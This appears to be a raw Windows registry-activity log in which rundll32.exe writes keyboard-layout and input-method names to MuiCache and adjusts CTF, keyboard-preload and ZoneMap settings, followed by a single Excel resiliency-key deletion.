rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5043
Latvian
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5045
Lithuanian IBM
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5151
Tajik
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5124
Persian
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5118
Vietnamese
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5120
Armenian Eastern
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5117
Azeri Latin
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5163
Sorbian Standard (Legacy)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5109
Macedonian (FYROM)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5191
Setswana
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5119
Georgian
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5108
Faeroese
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5096
Devanagari - INSCRIPT
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5140
Maltese 47-Key
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5138
Norwegian with Sami
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5113
Kazakh
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5128
Kyrgyz Cyrillic
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5150
Turkmen
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5116
Tatar
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5135
Bengali
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5101
Punjabi
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5097
Gujarati
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5100
Oriya
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5102
Tamil
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5103
Telugu
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5098
Kannada
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5139
Malayalam
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5177
Assamese - INSCRIPT
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5104
Marathi
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5127
Mongolian Cyrillic
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5154
Tibetan (PRC)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5145
United Kingdom Extended
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5161
Khmer
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5162
Lao
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5130
Syriac
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5166
Sinhala
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5169
Nepali
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5159
Pashto (Afghanistan)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5132
Divehi Phonetic
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5187
Hausa
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5189
Yoruba
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5186
Sesotho sa Leboa
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5148
Bashkir
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5168
Luxembourgish
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5170
Greenlandic
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5188
Igbo
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5165
Uyghur (Legacy)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5146
Maori
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5160
Yakut
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5190
Wolof
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5072
Chinese (Simplified) - US Keyboard
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5024
Swiss German
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5025
United Kingdom
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5017
Latin American
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5002
Belgian French
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5001
Belgian (Period)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5019
Portuguese
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5038
Serbian (Latin)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5115
Azeri Cyrillic
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5144
Swedish with Sami
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5114
Uzbek Cyrillic
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5158
Mongolian (Mongolian Script)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5156
Inuktitut - Latin
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5192
Chinese (Traditional, Hong Kong S.A.R.) - US Keyboard
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5005
Canadian French (Legacy)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5057
Serbian (Cyrillic)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5193
Chinese (Simplified, Singapore) - US Keyboard
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5004
Canadian French
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5023
Swiss French
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5194
Chinese (Traditional, Macao S.A.R.) - US Keyboard
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5014
Irish
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5155
Bosnian (Cyrillic)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5085
Arabic (102)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5054
Bulgarian (Latin)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5032
Czech (QWERTY)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5012
German (IBM)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5048
Greek (220)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5092
United States-Dvorak
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5021
Spanish Variation
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5034
Hungarian 101-key
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5016
Italian (142)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5036
Polish (214)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5126
Portuguese (Brazilian ABNT2)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5175
Romanian (Standard)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5056
Russian (Typewriter)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5040
Slovak (QWERTY)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5080
Thai Pattachote
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5059
Turkish F
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5044
Latvian (QWERTY)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5088
Lithuanian
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5121
Armenian Western
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5164
Sorbian Extended
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5174
Macedonian (FYROM) - Standard
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5182
Georgian (QWERTY)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5105
Hindi Traditional
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5141
Maltese 48-Key
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5143
Sami Extended Norway
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5136
Bengali - INSCRIPT (Legacy)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5131
Syriac Phonetic
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5167
Sinhala - Wij 9
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5171
Inuktitut - Naqittaut
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5133
Divehi Typewriter
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5185
Uyghur
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5089
Belgian (Comma)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5137
Finnish with Sami
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5110
Canadian Multilingual Standard
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5125
Gaelic
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5086
Arabic (102) AZERTY
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5173
Bulgarian (Phonetic)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5087
Czech Programmers
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5049
Greek (319)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5026
United States-International
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5176
Romanian (Programmers)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5081
Thai Kedmanee (non-ShiftLock)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5179
Ukrainian (Enhanced)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5172
Lithuanian Standard
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5184
Sorbian Standard
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5181
Georgian (Ergonomic)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5178
Bengali - INSCRIPT
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5142
Sami Extended Finland-Sweden
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5180
Bulgarian
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5050
Greek (220) Latin
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5027
United States-Dvorak for left hand
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5082
Thai Pattachote (non-ShiftLock)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5195
Bulgarian (Phonetic Traditional)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5051
Greek (319) Latin
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5028
United States-Dvorak for right hand
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5047
Greek Latin
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5123
US English Table for IBM Arabic 238_L
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5122
Greek Polytonic
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\system32\input.dll,-5183
Microsoft IME
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5149
Chinese (Traditional) - New Quick
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5067
Chinese (Traditional) - ChangJie
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5111
Chinese (Traditional) - Quick
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5066
Chinese (Traditional) - Phonetic
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5090
Chinese (Traditional) - New Phonetic
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5093
Chinese (Traditional) - New ChangJie
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5091
Chinese (Simplified) - Microsoft Pinyin New Experience Input Style
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5076
Chinese (Simplified) - Microsoft Pinyin ABC Input Style
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll,-90
Tablet PC Correction
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5183
Microsoft IME
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\IME\SpTip.DLL,-102
Speech Recognition
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-10
Chinese Traditional DaYi (version 6.0)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-11
Chinese Traditional Array (version 6.0)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-17
Amharic Input Method (version 1.0)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-16
Yi Input Method (version 1.0)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-12
Chinese Simplified QuanPin (version 6.0)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-14
Chinese Simplified ZhengMa (version 6.0)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-13
Chinese Simplified ShuangPin (version 6.0)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll,-91
Tablet PC Text Insertion
764
rundll32.exe
write
HKEY_CURRENT_USER\Keyboard Layout\Preload
1
00000409
764
rundll32.exe
write
HKEY_CURRENT_USER\Keyboard Layout\Preload
2
00000410
764
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
Default
{00000000-0000-0000-0000-000000000000}
764
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
Profile
{00000000-0000-0000-0000-000000000000}
764
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
KeyboardLayout
67699721
764
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
764
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International\Geo
Nation
118
3920
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
3920
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409
3920
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\Language
3920
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
3920
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
3920
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000409
3920
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
3920
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
3920
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410
3920
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem
3920
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
3920
rundll32.exe
write
HKEY_CURRENT_USER\Keyboard Layout\Preload
1
00000409
3920
rundll32.exe
write
HKEY_CURRENT_USER\Keyboard Layout\Preload
2
00000410
3920
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
Default
{00000000-0000-0000-0000-000000000000}
3920
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
Profile
{00000000-0000-0000-0000-000000000000}
3920
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
KeyboardLayout
67699721
3920
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\Language
00000001
00000409
3920
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\Language
00000000
00000410
3920
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
CLSID
{00000000-0000-0000-0000-000000000000}
3920
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
Profile
{00000000-0000-0000-0000-000000000000}
3920
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
KeyboardLayout
67699721
3920
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
CLSID
{00000000-0000-0000-0000-000000000000}
3920
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
Profile
{00000000-0000-0000-0000-000000000000}
3920
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
KeyboardLayout
68158480
1916
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
1916
